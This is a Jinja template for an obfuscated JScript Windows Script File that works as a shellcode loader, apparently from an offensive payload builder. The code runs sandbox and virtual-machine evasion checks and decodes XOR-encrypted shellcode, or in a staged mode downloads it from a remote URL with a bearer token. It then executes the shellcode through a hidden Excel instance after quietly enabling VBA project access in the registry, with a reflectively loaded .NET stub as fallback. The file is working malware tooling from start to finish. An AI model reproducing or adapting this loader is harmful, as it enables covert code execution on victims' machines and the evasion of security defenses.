<package>
<job id="{{ v.job_id }}">
<script language="JScript">
<![CDATA[
function {{ v.fn_build_str }}(a){var {{ v.jsc_lv_bs }}="";for(var {{ v.jsc_lv_bi }}=0;{{ v.jsc_lv_bi }}<a.length;{{ v.jsc_lv_bi }}++){{ v.jsc_lv_bs }}+=String.fromCharCode(a[{{ v.jsc_lv_bi }}]);return {{ v.jsc_lv_bs }};}

function {{ v.fn_sandbox }}() {
    try {
        var {{ v.jsc_lv_wmi }} = GetObject({{ v.fn_build_str }}([{{ v.jsc_winmgmts }}]));
        var {{ v.jsc_lv_pq }}  = {{ v.jsc_lv_wmi }}.ExecQuery({{ v.fn_build_str }}([{{ v.jsc_wmi_proc_q }}]));
        var {{ v.jsc_lv_bad }} = {{ v.fn_build_str }}([{{ v.jsc_vm_procs }}]).split("|");
        for (var {{ v.jsc_lv_e }} = new Enumerator({{ v.jsc_lv_pq }}); !{{ v.jsc_lv_e }}.atEnd(); {{ v.jsc_lv_e }}.moveNext()) {
            var {{ v.jsc_lv_n }} = {{ v.jsc_lv_e }}.item().Name.toLowerCase();
            for (var {{ v.jsc_lv_sli }} = 0; {{ v.jsc_lv_sli }} < {{ v.jsc_lv_bad }}.length; {{ v.jsc_lv_sli }}++) { if ({{ v.jsc_lv_n }} === {{ v.jsc_lv_bad }}[{{ v.jsc_lv_sli }}]) return true; }
        }
        var {{ v.jsc_lv_mq }} = {{ v.jsc_lv_wmi }}.ExecQuery({{ v.fn_build_str }}([{{ v.jsc_wmi_monitor_q }}]));
        for (var {{ v.jsc_lv_em }} = new Enumerator({{ v.jsc_lv_mq }}); !{{ v.jsc_lv_em }}.atEnd(); {{ v.jsc_lv_em }}.moveNext()) {
            var {{ v.jsc_lv_d }} = {{ v.jsc_lv_em }}.item();
            if ({{ v.jsc_lv_d }}.ScreenWidth && {{ v.jsc_lv_d }}.ScreenWidth < 800) return true;
        }
    } catch(e) {}
    try {
        var {{ v.jsc_lv_sh }} = new ActiveXObject({{ v.fn_build_str }}([{{ v.jsc_wscript_shell }}]));
        var {{ v.jsc_lv_vmr }}=[{{ jsc_vmware_reg_enc }}],{{ v.jsc_lv_vmx }}={{ jsc_vmware_reg_xk }};
        for(var {{ v.jsc_lv_ri }}=0;{{ v.jsc_lv_ri }}<{{ v.jsc_lv_vmr }}.length;{{ v.jsc_lv_ri }}++){{ v.jsc_lv_vmr }}[{{ v.jsc_lv_ri }}]^={{ v.jsc_lv_vmx }};
        {{ v.jsc_lv_sh }}.RegRead({{ v.fn_build_str }}({{ v.jsc_lv_vmr }}));
        return true;
    } catch(e) {}
    try {
        var {{ v.jsc_lv_sh2 }} = new ActiveXObject({{ v.fn_build_str }}([{{ v.jsc_wscript_shell }}]));
        var {{ v.jsc_lv_vbr }}=[{{ jsc_vbox_reg_enc }}],{{ v.jsc_lv_vbx }}={{ jsc_vbox_reg_xk }};
        for(var {{ v.jsc_lv_ri2 }}=0;{{ v.jsc_lv_ri2 }}<{{ v.jsc_lv_vbr }}.length;{{ v.jsc_lv_ri2 }}++){{ v.jsc_lv_vbr }}[{{ v.jsc_lv_ri2 }}]^={{ v.jsc_lv_vbx }};
        {{ v.jsc_lv_sh2 }}.RegRead({{ v.fn_build_str }}({{ v.jsc_lv_vbr }}));
        return true;
    } catch(e) {}
    try {
        var {{ v.jsc_lv_fso }} = new ActiveXObject({{ v.fn_build_str }}([{{ v.jsc_fs_obj }}]));
        var {{ v.jsc_lv_drv }} = {{ v.jsc_lv_fso }}.GetDrive("C:");
        if ({{ v.jsc_lv_drv }}.TotalSize < 53687091200) return true;
    } catch(e) {}
    try {
        var {{ v.jsc_lv_wmi2 }} = GetObject({{ v.fn_build_str }}([{{ v.jsc_winmgmts }}]));
        var {{ v.jsc_lv_prq }} = {{ v.jsc_lv_wmi2 }}.ExecQuery({{ v.fn_build_str }}([{{ v.jsc_wmi_printer_q }}]));
        var {{ v.jsc_lv_pc }} = 0;
        for (var {{ v.jsc_lv_ep2 }} = new Enumerator({{ v.jsc_lv_prq }}); !{{ v.jsc_lv_ep2 }}.atEnd(); {{ v.jsc_lv_ep2 }}.moveNext()) {{ v.jsc_lv_pc }}++;
        if ({{ v.jsc_lv_pc }} === 0) return true;
    } catch(e) {}
    try {
        var {{ v.jsc_lv_wmi3 }} = GetObject({{ v.fn_build_str }}([{{ v.jsc_winmgmts }}]));
        var {{ v.jsc_lv_naq }} = {{ v.jsc_lv_wmi3 }}.ExecQuery({{ v.fn_build_str }}([{{ v.jsc_wmi_mac_q }}]));
        var {{ v.jsc_lv_nac }} = 0;
        for (var {{ v.jsc_lv_ena }} = new Enumerator({{ v.jsc_lv_naq }}); !{{ v.jsc_lv_ena }}.atEnd(); {{ v.jsc_lv_ena }}.moveNext()) {{ v.jsc_lv_nac }}++;
        if ({{ v.jsc_lv_nac }} < 2) return true;
    } catch(e) {}
    try {
        var {{ v.jsc_lv_envobj }} = new ActiveXObject({{ v.fn_build_str }}([{{ v.jsc_wscript_shell }}])).Environment("Process");
        if ({{ v.jsc_lv_envobj }}({{ v.fn_build_str }}([{{ v.jsc_env_vbox }}])) !== "") return true;
        if ({{ v.jsc_lv_envobj }}({{ v.fn_build_str }}([{{ v.jsc_env_sandboxie }}])) !== "") return true;
    } catch(e) {}
    return false;
}

var {{ v.var_sc }}  = {% for chunk in shellcode_chunks %}"{{ chunk }}"{% if not loop.last %}+{% endif %}{% endfor %};
var {{ v.var_key }} = {% for chunk in key_chunks %}"{{ chunk }}"{% if not loop.last %}+{% endif %}{% endfor %};

function {{ v.fn_hex2arr }}(h) {
    var {{ v.jsc_lv_ha }} = []; for (var {{ v.jsc_lv_hi }} = 0; {{ v.jsc_lv_hi }} < h.length; {{ v.jsc_lv_hi }} += 2)
        {{ v.jsc_lv_ha }}.push(parseInt(h.substr({{ v.jsc_lv_hi }}, 2), 16));
    return {{ v.jsc_lv_ha }};
}

function {{ v.fn_decrypt }}(d, k) {
    var {{ v.jsc_lv_xo }} = []; for (var {{ v.jsc_lv_xi2 }} = 0; {{ v.jsc_lv_xi2 }} < d.length; {{ v.jsc_lv_xi2 }}++)
        {{ v.jsc_lv_xo }}.push(d[{{ v.jsc_lv_xi2 }}] ^ k[{{ v.jsc_lv_xi2 }} % k.length]);
    return {{ v.jsc_lv_xo }};
}

function {{ v.fn_exec }}() {
    if ({{ v.fn_sandbox }}()) { WScript.Quit(0); }
    var {{ v.jsc_lv_cx }} = -999, {{ v.jsc_lv_cy }} = -999;
    try {
        var {{ v.jsc_lv_a1 }}=new ActiveXObject({{ v.fn_build_str }}([{{ v.jsc_sys_refl_asm }}])),{{ v.jsc_lv_w1 }}={{ v.jsc_lv_a1 }}.LoadWithPartialName({{ v.fn_build_str }}([{{ v.jsc_sys_win_forms }}]));
        if({{ v.jsc_lv_w1 }}){var {{ v.jsc_lv_t1 }}={{ v.jsc_lv_w1 }}.GetType({{ v.fn_build_str }}([{{ v.jsc_sys_win_forms_cur }}]));
        if({{ v.jsc_lv_t1 }}){var {{ v.jsc_lv_pp1 }}={{ v.jsc_lv_t1 }}.GetProperty({{ v.fn_build_str }}([{{ v.jsc_cursor_position }}]),24);
        if({{ v.jsc_lv_pp1 }}){var {{ v.jsc_lv_ps1 }}={{ v.jsc_lv_pp1 }}.GetValue(null,null);if({{ v.jsc_lv_ps1 }}){ {{ v.jsc_lv_cx }}={{ v.jsc_lv_ps1 }}.GetType().GetProperty({{ v.fn_build_str }}([88])).GetValue({{ v.jsc_lv_ps1 }},null);{{ v.jsc_lv_cy }}={{ v.jsc_lv_ps1 }}.GetType().GetProperty({{ v.fn_build_str }}([89])).GetValue({{ v.jsc_lv_ps1 }},null);}}}}
    } catch(e) {}
    WScript.Sleep(2000 + Math.floor(Math.random() * 3000));
    if ({{ v.jsc_lv_cx }} !== -999) {
        try {
            var {{ v.jsc_lv_a2 }}=new ActiveXObject({{ v.fn_build_str }}([{{ v.jsc_sys_refl_asm }}])),{{ v.jsc_lv_w2 }}={{ v.jsc_lv_a2 }}.LoadWithPartialName({{ v.fn_build_str }}([{{ v.jsc_sys_win_forms }}]));
            if({{ v.jsc_lv_w2 }}){var {{ v.jsc_lv_t2 }}={{ v.jsc_lv_w2 }}.GetType({{ v.fn_build_str }}([{{ v.jsc_sys_win_forms_cur }}]));
            if({{ v.jsc_lv_t2 }}){var {{ v.jsc_lv_pp2 }}={{ v.jsc_lv_t2 }}.GetProperty({{ v.fn_build_str }}([{{ v.jsc_cursor_position }}]),24);
            if({{ v.jsc_lv_pp2 }}){var {{ v.jsc_lv_ps2 }}={{ v.jsc_lv_pp2 }}.GetValue(null,null);if({{ v.jsc_lv_ps2 }}){var {{ v.jsc_lv_cx2 }}={{ v.jsc_lv_ps2 }}.GetType().GetProperty({{ v.fn_build_str }}([88])).GetValue({{ v.jsc_lv_ps2 }},null);var {{ v.jsc_lv_cy2 }}={{ v.jsc_lv_ps2 }}.GetType().GetProperty({{ v.fn_build_str }}([89])).GetValue({{ v.jsc_lv_ps2 }},null);if({{ v.jsc_lv_cx }}==={{ v.jsc_lv_cx2 }}&&{{ v.jsc_lv_cy }}==={{ v.jsc_lv_cy2 }})WScript.Quit(0);}}}}
        } catch(e2) {}
    }
    {%- if is_staged %}
    // Staged: XOR-decode URL/JWT/UA at runtime, fetch via MSXML2.ServerXMLHTTP
    // with Bearer auth, return raw shellcode bytes as int[] via VBArray.toArray().
    var {{ sg.sg_lv_url }}=[{{ staged_url_csv }}],{{ sg.sg_lv_jwt }}=[{{ staged_jwt_csv }}],{{ sg.sg_lv_ua }}=[{{ staged_ua_csv }}];
    for(var {{ sg.sg_lv_i }}=0;{{ sg.sg_lv_i }}<{{ sg.sg_lv_url }}.length;{{ sg.sg_lv_i }}++){{ sg.sg_lv_url }}[{{ sg.sg_lv_i }}]^={{ staged_url_xk }};
    for(var {{ sg.sg_lv_i }}=0;{{ sg.sg_lv_i }}<{{ sg.sg_lv_jwt }}.length;{{ sg.sg_lv_i }}++){{ sg.sg_lv_jwt }}[{{ sg.sg_lv_i }}]^={{ staged_jwt_xk }};
    for(var {{ sg.sg_lv_i }}=0;{{ sg.sg_lv_i }}<{{ sg.sg_lv_ua }}.length;{{ sg.sg_lv_i }}++){{ sg.sg_lv_ua }}[{{ sg.sg_lv_i }}]^={{ staged_ua_xk }};
    var {{ sg.sg_lv_req }};
    try { {{ sg.sg_lv_req }} = new ActiveXObject({{ v.fn_build_str }}([77,83,88,77,76,50,46,83,101,114,118,101,114,88,77,76,72,84,84,80,46,54,46,48])); }
    catch(_q1) { try { {{ sg.sg_lv_req }} = new ActiveXObject({{ v.fn_build_str }}([77,83,88,77,76,50,46,88,77,76,72,84,84,80])); } catch(_q2) { WScript.Quit(0); } }
    {{ sg.sg_lv_req }}.open({{ v.fn_build_str }}([71,69,84]), {{ v.fn_build_str }}({{ sg.sg_lv_url }}), false);
    {{ sg.sg_lv_req }}.setRequestHeader({{ v.fn_build_str }}([65,117,116,104,111,114,105,122,97,116,105,111,110]), {{ v.fn_build_str }}([66,101,97,114,101,114,32]) + {{ v.fn_build_str }}({{ sg.sg_lv_jwt }}));
    {{ sg.sg_lv_req }}.setRequestHeader({{ v.fn_build_str }}([85,115,101,114,45,65,103,101,110,116]), {{ v.fn_build_str }}({{ sg.sg_lv_ua }}));
    try { {{ sg.sg_lv_req }}.send(); } catch(_qs) { WScript.Quit(0); }
    if ({{ sg.sg_lv_req }}.status !== 200) { WScript.Quit(0); }
    var {{ v.jsc_lv_sc }} = new VBArray({{ sg.sg_lv_req }}.responseBody).toArray();
    // Zeroise sensitive buffers
    for(var {{ sg.sg_lv_i }}=0;{{ sg.sg_lv_i }}<{{ sg.sg_lv_jwt }}.length;{{ sg.sg_lv_i }}++){{ sg.sg_lv_jwt }}[{{ sg.sg_lv_i }}]=0;
    {%- else %}
    var {{ v.jsc_lv_k }} = {{ v.fn_hex2arr }}({{ v.var_key }});
    for (var {{ v.jsc_lv_ki }} = 0; {{ v.jsc_lv_ki }} < {{ v.jsc_lv_k }}.length; {{ v.jsc_lv_ki }}++) {{ v.jsc_lv_k }}[{{ v.jsc_lv_ki }}] ^= {{ key_tweak }};
    var {{ v.jsc_lv_sc }}  = {{ v.fn_decrypt }}({{ v.fn_hex2arr }}({{ v.var_sc }}), {{ v.jsc_lv_k }});
    {%- endif %}
    {%- if "ExcelComExec" in feature_names %}
    var jsc_lv_xl, jsc_lv_wb, jsc_lv_vbm, jsc_lv_vbcode;
    var jsc_lv_wsh, jsc_lv_vers, jsc_lv_saved, jsc_lv_vi, jsc_lv_regbase, jsc_lv_regtail, jsc_lv_regdword;
    try {
        jsc_lv_wsh = new ActiveXObject({{ v.fn_build_str }}([{{ v.jsc_wscript_shell }}]));
        jsc_lv_regbase = {{ v.fn_build_str }}([72,75,67,85,92,83,111,102,116,119,97,114,101,92,77,105,99,114,111,115,111,102,116,92,79,102,102,105,99,101,92]);
        jsc_lv_regtail = {{ v.fn_build_str }}([92,69,120,99,101,108,92,83,101,99,117,114,105,116,121,92,65,99,99,101,115,115,86,66,79,77]);
        jsc_lv_regdword = {{ v.fn_build_str }}([82,69,71,95,68,87,79,82,68]);
        jsc_lv_vers = ["16.0", "15.0", "14.0"];
        jsc_lv_saved = {};
        for (jsc_lv_vi = 0; jsc_lv_vi < jsc_lv_vers.length; jsc_lv_vi++) {
            var _rk = jsc_lv_regbase + jsc_lv_vers[jsc_lv_vi] + jsc_lv_regtail;
            try { jsc_lv_saved[jsc_lv_vers[jsc_lv_vi]] = jsc_lv_wsh.RegRead(_rk); }
            catch(_rr) { jsc_lv_saved[jsc_lv_vers[jsc_lv_vi]] = -1; }
            try { jsc_lv_wsh.RegWrite(_rk, 1, jsc_lv_regdword); } catch(_rw) {}
        }
    } catch(_tcerr) {}

    try {
        jsc_lv_xl = new ActiveXObject({{ v.fn_build_str }}([69,120,99,101,108,46,65,112,112,108,105,99,97,116,105,111,110]));
        jsc_lv_xl.Visible = false;
        jsc_lv_xl.DisplayAlerts = false;
        jsc_lv_wb = jsc_lv_xl.Workbooks.Add();
        jsc_lv_vbcode = {{ v.fn_build_str }}([
            80,114,105,118,97,116,101,32,68,101,99,108,97,114,101,32,80,116,114,83,97,102,101,32,70,117,110,99,116,105,111,110,32,86,65,32,76,105,98,32,34,107,101,114,110,101,108,51,50,34,32,65,108,105,97,115,32,34,86,105,114,116,117,97,108,65,108,108,111,99,34,32,40,66,121,86,97,108,32,108,80,32,65,115,32,76,111,110,103,80,116,114,44,32,66,121,86,97,108,32,100,83,32,65,115,32,76,111,110,103,80,116,114,44,32,66,121,86,97,108,32,102,65,32,65,115,32,76,111,110,103,44,32,66,121,86,97,108,32,102,80,32,65,115,32,76,111,110,103,41,32,65,115,32,76,111,110,103,80,116,114,13,10,
            80,114,105,118,97,116,101,32,68,101,99,108,97,114,101,32,80,116,114,83,97,102,101,32,83,117,98,32,67,77,32,76,105,98,32,34,107,101,114,110,101,108,51,50,34,32,65,108,105,97,115,32,34,82,116,108,77,111,118,101,77,101,109,111,114,121,34,32,40,68,101,115,116,32,65,115,32,65,110,121,44,32,83,114,99,32,65,115,32,65,110,121,44,32,66,121,86,97,108,32,76,32,65,115,32,76,111,110,103,80,116,114,41,13,10,
            80,114,105,118,97,116,101,32,68,101,99,108,97,114,101,32,80,116,114,83,97,102,101,32,70,117,110,99,116,105,111,110,32,67,84,32,76,105,98,32,34,107,101,114,110,101,108,51,50,34,32,65,108,105,97,115,32,34,67,114,101,97,116,101,84,104,114,101,97,100,34,32,40,66,121,86,97,108,32,108,84,65,32,65,115,32,76,111,110,103,80,116,114,44,32,66,121,86,97,108,32,100,83,83,32,65,115,32,76,111,110,103,80,116,114,44,32,66,121,86,97,108,32,108,83,65,32,65,115,32,76,111,110,103,80,116,114,44,32,66,121,86,97,108,32,108,80,32,65,115,32,76,111,110,103,80,116,114,44,32,66,121,86,97,108,32,100,67,70,32,65,115,32,76,111,110,103,44,32,66,121,82,101,102,32,108,84,73,32,65,115,32,76,111,110,103,41,32,65,115,32,76,111,110,103,80,116,114,13,10,
            83,117,98,32,82,117,110,77,101,40,115,99,40,41,32,65,115,32,66,121,116,101,41,13,10,
            32,32,32,32,68,105,109,32,112,32,65,115,32,76,111,110,103,80,116,114,13,10,
            32,32,32,32,112,32,61,32,86,65,40,48,44,32,85,66,111,117,110,100,40,115,99,41,32,43,32,49,44,32,38,72,51,48,48,48,44,32,38,72,52,48,41,13,10,
            32,32,32,32,67,77,32,66,121,86,97,108,32,112,44,32,115,99,40,48,41,44,32,85,66,111,117,110,100,40,115,99,41,32,43,32,49,13,10,
            32,32,32,32,67,84,32,48,44,32,48,44,32,112,44,32,48,44,32,48,44,32,48,13,10,
            69,110,100,32,83,117,98
        ]);
        var jsc_lv_comp = jsc_lv_wb.VBProject.VBComponents.Add(1);
        jsc_lv_comp.CodeModule.AddFromString(jsc_lv_vbcode);
        jsc_lv_xl.Run(jsc_lv_comp.Name + "." + {{ v.fn_build_str }}([82,117,110,77,101]), ({{ v.jsc_lv_sc }}));
        try { WScript.Sleep(60000); } catch(_sl) {}
        try { jsc_lv_wb.Close(false); } catch(_cw) {}
        try { jsc_lv_xl.Quit(); } catch(_qx) {}
    } catch(_xerr) {
        var {{ v.jsc_lv_loader }} = new ActiveXObject({{ v.fn_build_str }}([{{ v.jsc_sys_refl_asm }}]));
        var {{ v.jsc_lv_stub }}   = {{ v.fn_hex2arr }}("{{ dotnet_stub_hex }}");
        var {{ v.jsc_lv_asm }}    = {{ v.jsc_lv_loader }}.Load({{ v.jsc_lv_stub }});
        var {{ v.jsc_lv_t1 }}     = {{ v.jsc_lv_asm }}.GetType({{ v.fn_build_str }}([{{ v.jsc_stub_loader }}]));
        var {{ v.jsc_lv_mi }}     = {{ v.jsc_lv_t1 }}.GetMethod({{ v.fn_build_str }}([{{ v.jsc_stub_run }}]));
        {{ v.jsc_lv_mi }}.Invoke(null, [{{ v.jsc_lv_sc }}]);
    }

    try {
        if (jsc_lv_wsh && jsc_lv_saved) {
            for (jsc_lv_vi = 0; jsc_lv_vi < jsc_lv_vers.length; jsc_lv_vi++) {
                var _rk2 = jsc_lv_regbase + jsc_lv_vers[jsc_lv_vi] + jsc_lv_regtail;
                try {
                    if (jsc_lv_saved[jsc_lv_vers[jsc_lv_vi]] === -1) {
                        jsc_lv_wsh.RegDelete(_rk2);
                    } else {
                        jsc_lv_wsh.RegWrite(_rk2, jsc_lv_saved[jsc_lv_vers[jsc_lv_vi]], jsc_lv_regdword);
                    }
                } catch(_rr2) {}
            }
        }
    } catch(_trerr) {}
    {%- else %}
    var {{ v.jsc_lv_loader }} = new ActiveXObject({{ v.fn_build_str }}([{{ v.jsc_sys_refl_asm }}]));
    var {{ v.jsc_lv_stub }}   = {{ v.fn_hex2arr }}("{{ dotnet_stub_hex }}");
    var {{ v.jsc_lv_asm }}    = {{ v.jsc_lv_loader }}.Load({{ v.jsc_lv_stub }});
    var {{ v.jsc_lv_t1 }}     = {{ v.jsc_lv_asm }}.GetType({{ v.fn_build_str }}([{{ v.jsc_stub_loader }}]));
    var {{ v.jsc_lv_mi }}     = {{ v.jsc_lv_t1 }}.GetMethod({{ v.fn_build_str }}([{{ v.jsc_stub_run }}]));
    {{ v.jsc_lv_mi }}.Invoke(null, [{{ v.jsc_lv_sc }}]);
    {%- endif %}
}

{{ v.fn_exec }}();
]]>
</script>
</job>
</package>
